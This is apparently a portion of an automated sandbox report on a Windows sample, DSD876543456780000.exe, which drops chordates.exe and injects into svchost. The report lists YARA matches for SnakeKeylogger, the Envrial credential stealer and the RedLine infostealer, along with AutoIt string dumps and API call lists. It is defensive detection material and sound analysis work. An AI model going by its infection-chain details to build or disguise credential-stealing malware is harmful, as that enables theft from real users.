              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: DSD876543456780000.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: DSD876543456780000.exe, 00000000.00000003.2020898944.00000000036F1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_31249708-3
              Source: DSD876543456780000.exe, 00000000.00000003.2020898944.00000000036F1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_05664397-9
              Source: DSD876543456780000.exe, 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp - String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_0215ef2a-5)
              Source: DSD876543456780000.exe, 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8ef72394-3
              Source: chordates.exe - String found in binary or memory: This is a third-party compiled AutoIt script.
              Source: chordates.exe, 00000002.00000002.2040377228.0000000000F22000.00000002.00000001.01000000.00000004.sdmp - String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_b1c16028-0)
              Source: chordates.exe, 00000002.00000002.2040377228.0000000000F22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a431715a-5
              Source: chordates.exe, 00000005.00000002.2180979584.0000000000F22000.00000002.00000001.01000000.00000004.sdmp - String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_74bd6b52-7)
              Source: chordates.exe, 00000005.00000002.2180979584.0000000000F22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7dc1774e-b
              Source: DSD876543456780000.exe - String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_08f96a85-8)
              Source: DSD876543456780000.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6c380293-e
              Source: chordates.exe.0.dr - String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_b296044c-9)
              Source: chordates.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2eefaedd-b
              Source: C:\Windows\System32\wscript.exe - COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Users\user\Desktop\DSD876543456780000.exe - Code function 0_2_00C5D5EB: CreateFileW, DeviceIoControl, CloseHandle
              Source: C:\Users\user\Desktop\DSD876543456780000.exe - Code function 0_2_00C51201: LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
              Source: C:\Users\user\Desktop\DSD876543456780000.exe - Code function 0_2_00C5E8F6: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe - Code function 2_2_00ECE8F6: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
              Source: C:\Windows\SysWOW64\svchost.exe - Code function: String function 0040D606 appears 48 times
              Source: C:\Windows\SysWOW64\svchost.exe - Code function: String function 0040E1D8 appears 88 times
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe - Code function: String function 00E7F9F2 appears 40 times
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe - Code function: String function 00E69CB3 appears 31 times
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe - Code function: String function 00E80A30 appears 46 times
              Source: C:\Users\user\Desktop\DSD876543456780000.exe - Code function: String function 00C0F9F2 appears 40 times
              Source: C:\Users\user\Desktop\DSD876543456780000.exe - Code function: String function 00BF9CB3 appears 31 times
              Source: C:\Users\user\Desktop\DSD876543456780000.exe - Code function: String function 00C10A30 appears 46 times
              Source: DSD876543456780000.exe - Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE - Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE - Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE - Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook (author = ditekSHen, description = Detects executables with potential process hoocking)
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE - Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE - Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.chordates.exe.3a90000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
